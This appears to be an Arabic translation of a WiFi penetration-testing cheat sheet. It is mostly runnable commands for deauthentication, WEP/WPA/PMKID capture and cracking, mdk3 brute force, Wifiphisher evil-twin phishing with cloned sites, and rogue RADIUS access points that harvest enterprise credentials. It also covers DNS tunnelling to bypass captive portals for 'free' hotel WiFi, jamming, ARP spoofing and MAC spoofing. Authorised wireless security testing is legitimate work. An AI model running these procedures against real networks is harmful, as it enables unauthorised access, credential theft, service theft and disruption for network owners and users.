
دليل اختبار اختراق شبكات WiFi
2.1. بوابات الأسر
2.2. هجوم الوسيط
3.1. بدون عملاء
4.2. هجوم PMKID
4.3. هجوم بدون نقطة وصول
5.1. نقاط وصول وهمية
5.2. القوة العمياء
5.3. طرق EAP المدعومة
6.2. استخبارات المصادر المفتوحة
6.3. تشويش WiFi
6.4. أطر عمل أخرى
7.1. مهاجمة جهاز التوجيه
7.2. أنواع الماسحات
7.3. التزوير
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
تعيين وضع المراقبة
تشغيل Airodump-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC) وعنوان MAC لأحد العملاء ($CLIENT_MAC). لا توقف الالتقاط.
في محطة طرفية أخرى، قم بإلغاء مصادقة عميل أو جميعهم. عندما يلتقط Airodump-ng مصافحة من هذه الشبكة، سيظهر الاسم أو ESSID في المحطة الأولى:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC). لا توقف الالتقاط.
2.a. تنفيذ هجوم قاموسي
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. أو تنفيذ هجوم بالقوة العمياء
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
بالنسبة لمجموعة الأحرف، يمكن استخدام l (أحرف صغيرة)، u (أحرف كبيرة)، n (أرقام)، c (صغيرة+كبيرة)، m (صغيرة+كبيرة+أرقام) أو a (جميع الأحرف المطبوعة).
استنساخ موقع ويب باستخدام HTTrack
تثبيت Wifiphiser. أضف نتيجة HTTrack في مجلد جديد داخل wifiphisher/data/phishing-pages/new_page/html وملف إعدادات في wifiphisher/data/phishing-pages/new_page/config.ini.
أعد تجميع المشروع باستخدام python setup.py install أو الملف الثنائي في bin.
هذا الأمر يعمل بشكل صحيح في أحدث إصدار من Kali بعد تثبيت hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
الطريقة الأولى لتجاوز بوابة الأسر هي تغيير عنوان MAC الخاص بك إلى عنوان أحد المستخدمين المُصدّق عليهم بالفعل.
macchanger
سكريبت مخصص مثل هذا (Bash)
أيضًا، يمكنك استخدام سكريبتات لأتمتة العملية مثل:
الطريقة الثانية هي إنشاء نفق DNS. لهذا، من الضروري أن يكون لديك خادم DNS خاص بك يمكن الوصول إليه. يمكنك استخدام هذه الطريقة لتجاوز بوابة الأسر والحصول على WiFi "مجاني" في الفنادق والمطارات...
nslookup example.com
سجل "A": dns.$DOMAIN يشير إلى $SERVER_IP (مثال: dns.domain.com 139.59.172.117)
سجل "NS": hack.$DOMAIN يشير إلى dns.$DOMAIN (مثال: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
تحقق من عمله بشكل صحيح هنا
التنفيذ في العميل
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
بمجرد أن تكون في الشبكة، يمكنك اختبار ما إذا كانت عرضة لهجمات الوسيط.
هجوم تزوير ARP باستخدام Ettercap
استنشاق حركة المرور باستخدام Wireshark أو TCPdump
تحليل حركة المرور باستخدام PCredz (لينكس) أو Network Miner (ويندوز)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
يمكنك الحصول على قوائم كلمات من هنا.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
يمكنك استخدام هذا السكريبت أو اتباع هذه الخطوات:
تثبيت Hcxdumptool و Hcxtool (يمكنك استخدام هذا السكريبت).
إيقاف مدير الشبكة
airmon-ng check kill
3أ. إذا كنت تريد مهاجمة عنوان MAC معين
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
بنية كل سطر هي: PMKID * عنوان MAC للموجه * المحطة * ESSID (تحقق من: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
إذا كان لديك وصول إلى جهاز عميل مع تشغيل اتصال WiFi ولكن لا توجد شبكة حولك، فلا يزال بإمكانك مهاجمة تلك الشبكة إذا كان جهاز العميل قد اتصل بها سابقًا.
للقيام بذلك، عليك إنشاء نقطة وصول وهمية باستخدام hostapd مع ملف إعدادات مثل هذا، بأي كلمة مرور ولكن بنفس اسم الشبكة. أنشئ الشبكة المزيفة، سيحاول جهاز العميل الاتصال بها وتحصل على المصافحة الرباعية كما في القسم 4.1 من هذا الدليل.
في حال كنت لا ترغب في استخدام الجهاز الافتراضي، يمكنك تثبيت كل شيء باستخدام:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
ابدأ نقطة الوصول باستخدام:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
عند اتصال عميل، اقرأ السجلات باستخدام:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
البحث عن طرق EAP المدعومة
هذان هجومان متقدمان اكتشفهما العظيم Mathy Vanhoef:
سكريبتات هجوم Krack - موضحة في هذا الموقع
سكريبتات هجوم Frag - موضحة في هذا الموقع
مثال لإلغاء مصادقة جميع الأجهزة باستثناء نقطة وصول وهمية:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
لينكس:
ويندوز:
بمجرد أن تكون متصلاً بالشبكة
Nmap/Zenmap - ماسح أمني، ماسح منافذ، وأداة استكشاف شبكات
Masscan - الإصدار الأسرع من nmap (يمكن أن يكسر الأشياء، لذا كن حذرًا)
Netdiscover - استنشاق ARP. مفيد جدًا إذا كانت الشبكات مجزأة جيدًا
| نظام التشغيل | المنصة | بيانات الدخول | الحجم | الرابط |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |